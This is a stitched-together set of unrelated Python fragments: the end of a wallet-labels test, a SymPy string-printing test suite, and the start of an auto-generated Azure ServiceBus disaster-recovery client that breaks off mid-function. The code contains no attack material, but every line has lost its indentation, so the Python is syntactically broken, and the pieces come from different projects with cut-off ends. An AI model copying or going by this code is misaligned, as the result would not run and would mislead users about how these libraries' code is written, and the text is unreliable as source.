old_label.add_receive_address(new_address)
old_label.verify(node)
new_label.verify(node)
if __name__ == '__main__':
WalletLabelsTest().main()
|
|
from __future__ import division
from sympy import (Abs, Catalan, cos, Derivative, E, EulerGamma, exp,
factorial, factorial2, Function, GoldenRatio, I, Integer, Integral,
Interval, Lambda, Limit, Matrix, nan, O, oo, pi, Rational, Float, Rel,
S, sin, SparseMatrix, sqrt, summation, Sum, Symbol, symbols, Wild,
WildFunction, zeta, zoo, Dummy, Dict, Tuple, FiniteSet, factor,
MatrixSymbol, subfactorial, true, false, Equivalent, Xor, Complement)
from sympy.core import Expr
from sympy.physics.units import second, joule
from sympy.polys import Poly, RootOf, RootSum, groebner, ring, field, ZZ, QQ, lex, grlex
from sympy.geometry import Point, Circle
from sympy.utilities.pytest import raises
from sympy.printing import sstr, sstrrepr, StrPrinter
from sympy.core.trace import Tr
x, y, z, w = symbols('x,y,z,w')
d = Dummy('d')
def test_printmethod():
class R(Abs):
def _sympystr(self, printer):
return "foo(%s)" % printer._print(self.args[0])
assert sstr(R(x)) == "foo(x)"
class R(Abs):
def _sympystr(self, printer):
return "foo"
assert sstr(R(x)) == "foo"
def test_Abs():
assert str(Abs(x)) == "Abs(x)"
assert str(Abs(Rational(1, 6))) == "1/6"
assert str(Abs(Rational(-1, 6))) == "1/6"
def test_Add():
assert str(x + y) == "x + y"
assert str(x + 1) == "x + 1"
assert str(x + x**2) == "x**2 + x"
assert str(5 + x + y + x*y + x**2 + y**2) == "x**2 + x*y + x + y**2 + y + 5"
assert str(1 + x + x**2/2 + x**3/3) == "x**3/3 + x**2/2 + x + 1"
assert str(2*x - 7*x**2 + 2 + 3*y) == "-7*x**2 + 2*x + 3*y + 2"
assert str(x - y) == "x - y"
assert str(2 - x) == "-x + 2"
assert str(x - 2) == "x - 2"
assert str(x - y - z - w) == "-w + x - y - z"
assert str(x - z*y**2*z*w) == "-w*y**2*z**2 + x"
assert str(x - 1*y*x*y) == "-x*y**2 + x"
assert str(sin(x).series(x, 0, 15)) == "x - x**3/6 + x**5/120 - x**7/5040 + x**9/362880 - x**11/39916800 + x**13/6227020800 + O(x**15)"
def test_Catalan():
assert str(Catalan) == "Catalan"
def test_ComplexInfinity():
assert str(zoo) == "zoo"
def test_Derivative():
assert str(Derivative(x, y)) == "Derivative(x, y)"
assert str(Derivative(x**2, x, evaluate=False)) == "Derivative(x**2, x)"
assert str(Derivative(
x**2/y, x, y, evaluate=False)) == "Derivative(x**2/y, x, y)"
def test_dict():
assert str({1: 1 + x}) == sstr({1: 1 + x}) == "{1: x + 1}"
assert str({1: x**2, 2: y*x}) in ("{1: x**2, 2: x*y}", "{2: x*y, 1: x**2}")
assert sstr({1: x**2, 2: y*x}) == "{1: x**2, 2: x*y}"
def test_Dict():
assert str(Dict({1: 1 + x})) == sstr({1: 1 + x}) == "{1: x + 1}"
assert str(Dict({1: x**2, 2: y*x})) in (
"{1: x**2, 2: x*y}", "{2: x*y, 1: x**2}")
assert sstr(Dict({1: x**2, 2: y*x})) == "{1: x**2, 2: x*y}"
def test_Dummy():
assert str(d) == "_d"
assert str(d + x) == "_d + x"
def test_EulerGamma():
assert str(EulerGamma) == "EulerGamma"
def test_Exp():
assert str(E) == "E"
def test_factorial():
n = Symbol('n', integer=True)
assert str(factorial(-2)) == "zoo"
assert str(factorial(0)) == "1"
assert str(factorial(7)) == "5040"
assert str(factorial(n)) == "factorial(n)"
assert str(factorial(2*n)) == "factorial(2*n)"
assert str(factorial(factorial(n))) == 'factorial(factorial(n))'
assert str(factorial(factorial2(n))) == 'factorial(factorial2(n))'
assert str(factorial2(factorial(n))) == 'factorial2(factorial(n))'
assert str(factorial2(factorial2(n))) == 'factorial2(factorial2(n))'
assert str(subfactorial(3)) == "2"
assert str(subfactorial(n)) == "subfactorial(n)"
assert str(subfactorial(2*n)) == "subfactorial(2*n)"
def test_Function():
f = Function('f')
fx = f(x)
w = WildFunction('w')
assert str(f) == "f"
assert str(fx) == "f(x)"
assert str(w) == "w_"
def test_Geometry():
assert sstr(Point(0, 0)) == 'Point(0, 0)'
assert sstr(Circle(Point(0, 0), 3)) == 'Circle(Point(0, 0), 3)'
# TODO test other Geometry entities
def test_GoldenRatio():
assert str(GoldenRatio) == "GoldenRatio"
def test_ImaginaryUnit():
assert str(I) == "I"
def test_Infinity():
assert str(oo) == "oo"
assert str(oo*I) == "oo*I"
def test_Integer():
assert str(Integer(-1)) == "-1"
assert str(Integer(1)) == "1"
assert str(Integer(-3)) == "-3"
assert str(Integer(0)) == "0"
assert str(Integer(25)) == "25"
def test_Integral():
assert str(Integral(sin(x), y)) == "Integral(sin(x), y)"
assert str(Integral(sin(x), (y, 0, 1))) == "Integral(sin(x), (y, 0, 1))"
def test_Interval():
a = Symbol('a', real=True)
assert str(Interval(0, a)) == "[0, a]"
assert str(Interval(0, a, False, False)) == "[0, a]"
assert str(Interval(0, a, True, False)) == "(0, a]"
assert str(Interval(0, a, False, True)) == "[0, a)"
assert str(Interval(0, a, True, True)) == "(0, a)"
def test_Lambda():
assert str(Lambda(d, d**2)) == "Lambda(_d, _d**2)"
# issue 2908
assert str(Lambda((), 1)) == "Lambda((), 1)"
assert str(Lambda((), x)) == "Lambda((), x)"
def test_Limit():
assert str(Limit(sin(x)/x, x, y)) == "Limit(sin(x)/x, x, y)"
assert str(Limit(1/x, x, 0)) == "Limit(1/x, x, 0)"
assert str(
Limit(sin(x)/x, x, y, dir="-")) == "Limit(sin(x)/x, x, y, dir='-')"
def test_list():
assert str([x]) == sstr([x]) == "[x]"
assert str([x**2, x*y + 1]) == sstr([x**2, x*y + 1]) == "[x**2, x*y + 1]"
assert str([x**2, [y + x]]) == sstr([x**2, [y + x]]) == "[x**2, [x + y]]"
def test_Matrix_str():
M = Matrix([[x**+1, 1], [y, x + y]])
assert str(M) == "Matrix([[x, 1], [y, x + y]])"
assert sstr(M) == "Matrix([\n[x, 1],\n[y, x + y]])"
M = Matrix([[1]])
assert str(M) == sstr(M) == "Matrix([[1]])"
M = Matrix([[1, 2]])
assert str(M) == sstr(M) == "Matrix([[1, 2]])"
M = Matrix()
assert str(M) == sstr(M) == "Matrix(0, 0, [])"
M = Matrix(0, 1, lambda i, j: 0)
assert str(M) == sstr(M) == "Matrix(0, 1, [])"
def test_Mul():
assert str(x/y) == "x/y"
assert str(y/x) == "y/x"
assert str(x/y/z) == "x/(y*z)"
assert str((x + 1)/(y + 2)) == "(x + 1)/(y + 2)"
assert str(2*x/3) == '2*x/3'
assert str(-2*x/3) == '-2*x/3'
assert str(-1.0*x) == '-1.0*x'
assert str(1.0*x) == '1.0*x'
class CustomClass1(Expr):
is_commutative = True
class CustomClass2(Expr):
is_commutative = True
cc1 = CustomClass1()
cc2 = CustomClass2()
assert str(Rational(2)*cc1) == '2*CustomClass1()'
assert str(cc1*Rational(2)) == '2*CustomClass1()'
assert str(cc1*Float("1.5")) == '1.5*CustomClass1()'
assert str(cc2*Rational(2)) == '2*CustomClass2()'
assert str(cc2*Rational(2)*cc1) == '2*CustomClass1()*CustomClass2()'
assert str(cc1*Rational(2)*cc2) == '2*CustomClass1()*CustomClass2()'
def test_NaN():
assert str(nan) == "nan"
def test_NegativeInfinity():
assert str(-oo) == "-oo"
def test_Order():
assert str(O(x)) == "O(x)"
assert str(O(x**2)) == "O(x**2)"
assert str(O(x*y)) == "O(x*y, x, y)"
assert str(O(x, x)) == "O(x)"
assert str(O(x, (x, 0))) == "O(x)"
assert str(O(x, (x, oo))) == "O(x, (x, oo))"
assert str(O(x, x, y)) == "O(x, x, y)"
assert str(O(x, x, y)) == "O(x, x, y)"
assert str(O(x, (x, oo), (y, oo))) == "O(x, (x, oo), (y, oo))"
def test_Permutation_Cycle():
from sympy.combinatorics import Permutation, Cycle
# general principle: economically, canonically show all moved elements
# and the size of the permutation.
for p, s in [
(Cycle(),
'Cycle()'),
(Cycle(2),
'Cycle(2)'),
(Cycle(2, 1),
'Cycle(1, 2)'),
(Cycle(1, 2)(5)(6, 7)(10),
'Cycle(1, 2)(6, 7)(10)'),
(Cycle(3, 4)(1, 2)(3, 4),
'Cycle(1, 2)(4)'),
]:
assert str(p) == s
Permutation.print_cyclic = False
for p, s in [
(Permutation([]),
'Permutation([])'),
(Permutation([], size=1),
'Permutation([0])'),
(Permutation([], size=2),
'Permutation([0, 1])'),
(Permutation([], size=10),
'Permutation([], size=10)'),
(Permutation([1, 0, 2]),
'Permutation([1, 0, 2])'),
(Permutation([1, 0, 2, 3, 4, 5]),
'Permutation([1, 0], size=6)'),
(Permutation([1, 0, 2, 3, 4, 5], size=10),
'Permutation([1, 0], size=10)'),
]:
assert str(p) == s
Permutation.print_cyclic = True
for p, s in [
(Permutation([]),
'Permutation()'),
(Permutation([], size=1),
'Permutation(0)'),
(Permutation([], size=2),
'Permutation(1)'),
(Permutation([], size=10),
'Permutation(9)'),
(Permutation([1, 0, 2]),
'Permutation(2)(0, 1)'),
(Permutation([1, 0, 2, 3, 4, 5]),
'Permutation(5)(0, 1)'),
(Permutation([1, 0, 2, 3, 4, 5], size=10),
'Permutation(9)(0, 1)'),
(Permutation([0, 1, 3, 2, 4, 5], size=10),
'Permutation(9)(2, 3)'),
]:
assert str(p) == s
def test_Pi():
assert str(pi) == "pi"
def test_Poly():
assert str(Poly(0, x)) == "Poly(0, x, domain='ZZ')"
assert str(Poly(1, x)) == "Poly(1, x, domain='ZZ')"
assert str(Poly(x, x)) == "Poly(x, x, domain='ZZ')"
assert str(Poly(2*x + 1, x)) == "Poly(2*x + 1, x, domain='ZZ')"
assert str(Poly(2*x - 1, x)) == "Poly(2*x - 1, x, domain='ZZ')"
assert str(Poly(-1, x)) == "Poly(-1, x, domain='ZZ')"
assert str(Poly(-x, x)) == "Poly(-x, x, domain='ZZ')"
assert str(Poly(-2*x + 1, x)) == "Poly(-2*x + 1, x, domain='ZZ')"
assert str(Poly(-2*x - 1, x)) == "Poly(-2*x - 1, x, domain='ZZ')"
assert str(Poly(x - 1, x)) == "Poly(x - 1, x, domain='ZZ')"
assert str(
Poly(x**2 + 1 + y, x)) == "Poly(x**2 + y + 1, x, domain='ZZ[y]')"
assert str(
Poly(x**2 - 1 + y, x)) == "Poly(x**2 + y - 1, x, domain='ZZ[y]')"
assert str(Poly(x**2 + I*x, x)) == "Poly(x**2 + I*x, x, domain='EX')"
assert str(Poly(x**2 - I*x, x)) == "Poly(x**2 - I*x, x, domain='EX')"
assert str(Poly(-x*y*z + x*y - 1, x, y, z)
) == "Poly(-x*y*z + x*y - 1, x, y, z, domain='ZZ')"
assert str(Poly(-w*x**21*y**7*z + (1 + w)*z**3 - 2*x*z + 1, x, y, z)) == \
"Poly(-w*x**21*y**7*z - 2*x*z + (w + 1)*z**3 + 1, x, y, z, domain='ZZ[w]')"
assert str(Poly(x**2 + 1, x, modulus=2)) == "Poly(x**2 + 1, x, modulus=2)"
assert str(Poly(2*x**2 + 3*x + 4, x, modulus=17)) == "Poly(2*x**2 + 3*x + 4, x, modulus=17)"
def test_PolyRing():
assert str(ring("x", ZZ, lex)[0]) == "Polynomial ring in x over ZZ with lex order"
assert str(ring("x,y", QQ, grlex)[0]) == "Polynomial ring in x, y over QQ with grlex order"
assert str(ring("x,y,z", ZZ["t"], lex)[0]) == "Polynomial ring in x, y, z over ZZ[t] with lex order"
def test_FracField():
assert str(field("x", ZZ, lex)[0]) == "Rational function field in x over ZZ with lex order"
assert str(field("x,y", QQ, grlex)[0]) == "Rational function field in x, y over QQ with grlex order"
assert str(field("x,y,z", ZZ["t"], lex)[0]) == "Rational function field in x, y, z over ZZ[t] with lex order"
def test_PolyElement():
Ruv, u,v = ring("u,v", ZZ)
Rxyz, x,y,z = ring("x,y,z", Ruv)
assert str(x - x) == "0"
assert str(x - 1) == "x - 1"
assert str(x + 1) == "x + 1"
assert str((u**2 + 3*u*v + 1)*x**2*y + u + 1) == "(u**2 + 3*u*v + 1)*x**2*y + u + 1"
assert str((u**2 + 3*u*v + 1)*x**2*y + (u + 1)*x) == "(u**2 + 3*u*v + 1)*x**2*y + (u + 1)*x"
assert str((u**2 + 3*u*v + 1)*x**2*y + (u + 1)*x + 1) == "(u**2 + 3*u*v + 1)*x**2*y + (u + 1)*x + 1"
assert str((-u**2 + 3*u*v - 1)*x**2*y - (u + 1)*x - 1) == "-(u**2 - 3*u*v + 1)*x**2*y - (u + 1)*x - 1"
assert str(-(v**2 + v + 1)*x + 3*u*v + 1) == "-(v**2 + v + 1)*x + 3*u*v + 1"
assert str(-(v**2 + v + 1)*x - 3*u*v + 1) == "-(v**2 + v + 1)*x - 3*u*v + 1"
def test_FracElement():
Fuv, u,v = field("u,v", ZZ)
Fxyzt, x,y,z,t = field("x,y,z,t", Fuv)
assert str(x - x) == "0"
assert str(x - 1) == "x - 1"
assert str(x + 1) == "x + 1"
assert str(x/3) == "x/3"
assert str(x/z) == "x/z"
assert str(x*y/z) == "x*y/z"
assert str(x/(z*t)) == "x/(z*t)"
assert str(x*y/(z*t)) == "x*y/(z*t)"
assert str((x - 1)/y) == "(x - 1)/y"
assert str((x + 1)/y) == "(x + 1)/y"
assert str((-x - 1)/y) == "(-x - 1)/y"
assert str((x + 1)/(y*z)) == "(x + 1)/(y*z)"
assert str(-y/(x + 1)) == "-y/(x + 1)"
assert str(y*z/(x + 1)) == "y*z/(x + 1)"
assert str(((u + 1)*x*y + 1)/((v - 1)*z - 1)) == "((u + 1)*x*y + 1)/((v - 1)*z - 1)"
assert str(((u + 1)*x*y + 1)/((v - 1)*z - t*u*v - 1)) == "((u + 1)*x*y + 1)/((v - 1)*z - u*v*t - 1)"
def test_Pow():
assert str(x**-1) == "1/x"
assert str(x**-2) == "x**(-2)"
assert str(x**2) == "x**2"
assert str((x + y)**-1) == "1/(x + y)"
assert str((x + y)**-2) == "(x + y)**(-2)"
assert str((x + y)**2) == "(x + y)**2"
assert str((x + y)**(1 + x)) == "(x + y)**(x + 1)"
assert str(x**Rational(1, 3)) == "x**(1/3)"
assert str(1/x**Rational(1, 3)) == "x**(-1/3)"
assert str(sqrt(sqrt(x))) == "x**(1/4)"
# not the same as x**-1
assert str(x**-1.0) == 'x**(-1.0)'
# see issue #2860
assert str(S(2)**-1.0) == '2**(-1.0)'
def test_sqrt():
assert str(sqrt(x)) == "sqrt(x)"
assert str(sqrt(x**2)) == "sqrt(x**2)"
assert str(1/sqrt(x)) == "1/sqrt(x)"
assert str(1/sqrt(x**2)) == "1/sqrt(x**2)"
assert str(y/sqrt(x)) == "y/sqrt(x)"
assert str(x**(1/2)) == "x**0.5"
assert str(1/x**(1/2)) == "x**(-0.5)"
def test_Rational():
n1 = Rational(1, 4)
n2 = Rational(1, 3)
n3 = Rational(2, 4)
n4 = Rational(2, -4)
n5 = Rational(0)
n7 = Rational(3)
n8 = Rational(-3)
assert str(n1*n2) == "1/12"
assert str(n1*n2) == "1/12"
assert str(n3) == "1/2"
assert str(n1*n3) == "1/8"
assert str(n1 + n3) == "3/4"
assert str(n1 + n2) == "7/12"
assert str(n1 + n4) == "-1/4"
assert str(n4*n4) == "1/4"
assert str(n4 + n2) == "-1/6"
assert str(n4 + n5) == "-1/2"
assert str(n4*n5) == "0"
assert str(n3 + n4) == "0"
assert str(n1**n7) == "1/64"
assert str(n2**n7) == "1/27"
assert str(n2**n8) == "27"
assert str(n7**n8) == "1/27"
assert str(Rational("-25")) == "-25"
assert str(Rational("1.25")) == "5/4"
assert str(Rational("-2.6e-2")) == "-13/500"
assert str(S("25/7")) == "25/7"
assert str(S("-123/569")) == "-123/569"
assert str(S("0.1[23]", rational=1)) == "61/495"
assert str(S("5.1[666]", rational=1)) == "31/6"
assert str(S("-5.1[666]", rational=1)) == "-31/6"
assert str(S("0.[9]", rational=1)) == "1"
assert str(S("-0.[9]", rational=1)) == "-1"
assert str(sqrt(Rational(1, 4))) == "1/2"
assert str(sqrt(Rational(1, 36))) == "1/6"
assert str((123**25) ** Rational(1, 25)) == "123"
assert str((123**25 + 1)**Rational(1, 25)) != "123"
assert str((123**25 - 1)**Rational(1, 25)) != "123"
assert str((123**25 - 1)**Rational(1, 25)) != "122"
assert str(sqrt(Rational(81, 36))**3) == "27/8"
assert str(1/sqrt(Rational(81, 36))**3) == "8/27"
assert str(sqrt(-4)) == str(2*I)
assert str(2**Rational(1, 10**10)) == "2**(1/10000000000)"
def test_Float():
# NOTE prec is the whole number of decimal digits
assert str(Float('1.23', prec=1 + 2)) == '1.23'
assert str(Float('1.23456789', prec=1 + 8)) == '1.23456789'
assert str(
Float('1.234567890123456789', prec=1 + 18)) == '1.234567890123456789'
assert str(pi.evalf(1 + 2)) == '3.14'
assert str(pi.evalf(1 + 14)) == '3.14159265358979'
assert str(pi.evalf(1 + 64)) == ('3.141592653589793238462643383279'
'5028841971693993751058209749445923')
assert str(pi.round(-1)) == '0.'
assert str((pi**400 - (pi**400).round(1)).n(2)) == '-0.e+88'
def test_Relational():
assert str(Rel(x, y, "<")) == "x < y"
assert str(Rel(x + y, y, "==")) == "x + y == y"
def test_RootOf():
assert str(RootOf(x**5 + 2*x - 1, 0)) == "RootOf(x**5 + 2*x - 1, 0)"
def test_RootSum():
f = x**5 + 2*x - 1
assert str(
RootSum(f, Lambda(z, z), auto=False)) == "RootSum(x**5 + 2*x - 1)"
assert str(RootSum(f, Lambda(
z, z**2), auto=False)) == "RootSum(x**5 + 2*x - 1, Lambda(z, z**2))"
def test_GroebnerBasis():
assert str(groebner(
[], x, y)) == "GroebnerBasis([], x, y, domain='ZZ', order='lex')"
F = [x**2 - 3*y - x + 1, y**2 - 2*x + y - 1]
assert str(groebner(F, order='grlex')) == \
"GroebnerBasis([x**2 - x - 3*y + 1, y**2 - 2*x + y - 1], x, y, domain='ZZ', order='grlex')"
assert str(groebner(F, order='lex')) == \
"GroebnerBasis([2*x - y**2 - y + 1, y**4 + 2*y**3 - 3*y**2 - 16*y + 7], x, y, domain='ZZ', order='lex')"
def test_set():
assert sstr(set()) == 'set()'
assert sstr(frozenset()) == 'frozenset()'
assert sstr(set([1, 2, 3])) == 'set([1, 2, 3])'
assert sstr(
set([1, x, x**2, x**3, x**4])) == 'set([1, x, x**2, x**3, x**4])'
def test_SparseMatrix():
M = SparseMatrix([[x**+1, 1], [y, x + y]])
assert str(M) == "Matrix([[x, 1], [y, x + y]])"
assert sstr(M) == "Matrix([\n[x, 1],\n[y, x + y]])"
def test_Sum():
assert str(summation(cos(3*z), (z, x, y))) == "Sum(cos(3*z), (z, x, y))"
assert str(Sum(x*y**2, (x, -2, 2), (y, -5, 5))) == \
"Sum(x*y**2, (x, -2, 2), (y, -5, 5))"
def test_Symbol():
assert str(y) == "y"
assert str(x) == "x"
e = x
assert str(e) == "x"
def test_tuple():
assert str((x,)) == sstr((x,)) == "(x,)"
assert str((x + y, 1 + x)) == sstr((x + y, 1 + x)) == "(x + y, x + 1)"
assert str((x + y, (
1 + x, x**2))) == sstr((x + y, (1 + x, x**2))) == "(x + y, (x + 1, x**2))"
def test_Unit():
assert str(second) == "s"
assert str(joule) == "kg*m**2/s**2" # issue 5560
def test_wild_str():
# Check expressions containing Wild not causing infinite recursion
w = Wild('x')
assert str(w + 1) == 'x_ + 1'
assert str(exp(2**w) + 5) == 'exp(2**x_) + 5'
assert str(3*w + 1) == '3*x_ + 1'
assert str(1/w + 1) == '1 + 1/x_'
assert str(w**2 + 1) == 'x_**2 + 1'
assert str(1/(1 - w)) == '1/(-x_ + 1)'
def test_zeta():
assert str(zeta(3)) == "zeta(3)"
def test_bug2():
e = x - y
a = str(e)
b = str(e)
assert a == b
def test_bug4():
e = -2*sqrt(x) - y/sqrt(x)/2
assert str(e) not in ["(-2)*x**1/2(-1/2)*x**(-1/2)*y",
"-2*x**1/2(-1/2)*x**(-1/2)*y", "-2*x**1/2-1/2*x**-1/2*w"]
assert str(e) == "-2*sqrt(x) - y/(2*sqrt(x))"
def test_issue_4021():
e = Integral(x, x) + 1
assert str(e) == 'Integral(x, x) + 1'
def test_sstrrepr():
assert sstr('abc') == 'abc'
assert sstrrepr('abc') == "'abc'"
e = ['a', 'b', 'c', x]
assert sstr(e) == "[a, b, c, x]"
assert sstrrepr(e) == "['a', 'b', 'c', x]"
def test_infinity():
assert sstr(oo*I) == "oo*I"
def test_full_prec():
assert sstr(S("0.3"), full_prec=True) == "0.300000000000000"
assert sstr(S("0.3"), full_prec="auto") == "0.300000000000000"
assert sstr(S("0.3"), full_prec=False) == "0.3"
assert sstr(S("0.3")*x, full_prec=True) in [
"0.300000000000000*x",
"x*0.300000000000000"
]
assert sstr(S("0.3")*x, full_prec="auto") in [
"0.3*x",
"x*0.3"
]
assert sstr(S("0.3")*x, full_prec=False) in [
"0.3*x",
"x*0.3"
]
def test_noncommutative():
A, B, C = symbols('A,B,C', commutative=False)
assert sstr(A*B*C**-1) == "A*B*C**(-1)"
assert sstr(C**-1*A*B) == "C**(-1)*A*B"
assert sstr(A*C**-1*B) == "A*C**(-1)*B"
assert sstr(sqrt(A)) == "sqrt(A)"
assert sstr(1/sqrt(A)) == "A**(-1/2)"
def test_empty_printer():
str_printer = StrPrinter()
assert str_printer.emptyPrinter("foo") == "foo"
assert str_printer.emptyPrinter(x*y) == "x*y"
assert str_printer.emptyPrinter(32) == "32"
def test_settings():
raises(TypeError, lambda: sstr(S(4), method="garbage"))
def test_RandomDomain():
from sympy.stats import Normal, Die, Exponential, pspace, where
X = Normal('x1', 0, 1)
assert str(where(X > 0)) == "Domain: x1 > 0"
D = Die('d1', 6)
assert str(where(D > 4)) == "Domain: Or(d1 == 5, d1 == 6)"
A = Exponential('a', 1)
B = Exponential('b', 1)
assert str(pspace(Tuple(A, B)).domain) == "Domain: And(a >= 0, b >= 0)"
def test_FiniteSet():
assert str(FiniteSet(*range(1, 51))) == '{1, 2, 3, ..., 48, 49, 50}'
assert str(FiniteSet(*range(1, 6))) == '{1, 2, 3, 4, 5}'
def test_PrettyPoly():
from sympy.polys.domains import QQ
F = QQ.frac_field(x, y)
R = QQ[x, y]
assert sstr(F.convert(x/(x + y))) == sstr(x/(x + y))
assert sstr(R.convert(x + y)) == sstr(x + y)
def test_categories():
from sympy.categories import (Object, NamedMorphism,
IdentityMorphism, Category)
A = Object("A")
B = Object("B")
f = NamedMorphism(A, B, "f")
id_A = IdentityMorphism(A)
K = Category("K")
assert str(A) == 'Object("A")'
assert str(f) == 'NamedMorphism(Object("A"), Object("B"), "f")'
assert str(id_A) == 'IdentityMorphism(Object("A"))'
assert str(K) == 'Category("K")'
def test_Tr():
A, B = symbols('A B', commutative=False)
t = Tr(A*B)
assert str(t) == 'Tr(A*B)'
def test_issue_6387():
assert str(factor(-3.0*z + 3)) == '-3.0*(1.0*z - 1.0)'
def test_MatMul_MatAdd():
from sympy import MatrixSymbol
assert str(2*(MatrixSymbol("X", 2, 2) + MatrixSymbol("Y", 2, 2))) == \
"2*(X + Y)"
def test_MatrixSlice():
from sympy.matrices.expressions import MatrixSymbol
assert str(MatrixSymbol('X', 10, 10)[:5, 1:9:2]) == 'X[:5, 1:9:2]'
assert str(MatrixSymbol('X', 10, 10)[5, :5:2]) == 'X[5, :5:2]'
def test_true_false():
assert str(true) == repr(true) == sstr(true) == "True"
assert str(false) == repr(false) == sstr(false) == "False"
def test_Equivalent():
assert str(Equivalent(y, x)) == "Equivalent(x, y)"
def test_Xor():
assert str(Xor(y, x, evaluate=False)) == "Xor(x, y)"
def test_Complement():
assert str(Complement(S.Reals, S.Naturals)) == '(-oo, oo) \ Naturals()'
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class DisasterRecoveryConfigsOperations(object):
"""DisasterRecoveryConfigsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.servicebus.v2021_01_01_preview.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def check_name_availability(
self,
resource_group_name, # type: str
namespace_name, # type: str
parameters, # type: "_models.CheckNameAvailability"
**kwargs # type: Any
):
# type: (...) -> "_models.CheckNameAvailabilityResult"
"""Check the give namespace name availability.
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:param parameters: Parameters to check availability of the given namespace name.
:type parameters: ~azure.mgmt.servicebus.v2021_01_01_preview.models.CheckNameAvailability
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CheckNameAvailabilityResult, or the result of cls(response)
:rtype: ~azure.mgmt.servicebus.v2021_01_01_preview.models.CheckNameAvailabilityResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CheckNameAvailabilityResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.check_name_availability.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'CheckNameAvailability')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('CheckNameAvailabilityResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
check_name_availability.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServiceBus/namespaces/{namespaceName}/disasterRecoveryConfigs/CheckNameAvailability'} # type: ignore
def list(
self,
resource_group_name, # type: str
namespace_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ArmDisasterRecoveryListResult"]
"""Gets all Alias(Disaster Recovery configurations).
:param resource_group_name: Name of the Resource group within the Azure subscription.
:type resource_group_name: str
:param namespace_name: The namespace name.
:type namespace_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ArmDisasterRecoveryListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.servicebus.v2021_01_01_preview.models.ArmDisasterRecoveryListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ArmDisasterRecoveryListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-01-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
'namespaceName': self._serialize.url("namespace_name", namespace_name, 'str', max_length=50, min_length=6),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ArmDisasterRecoveryListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
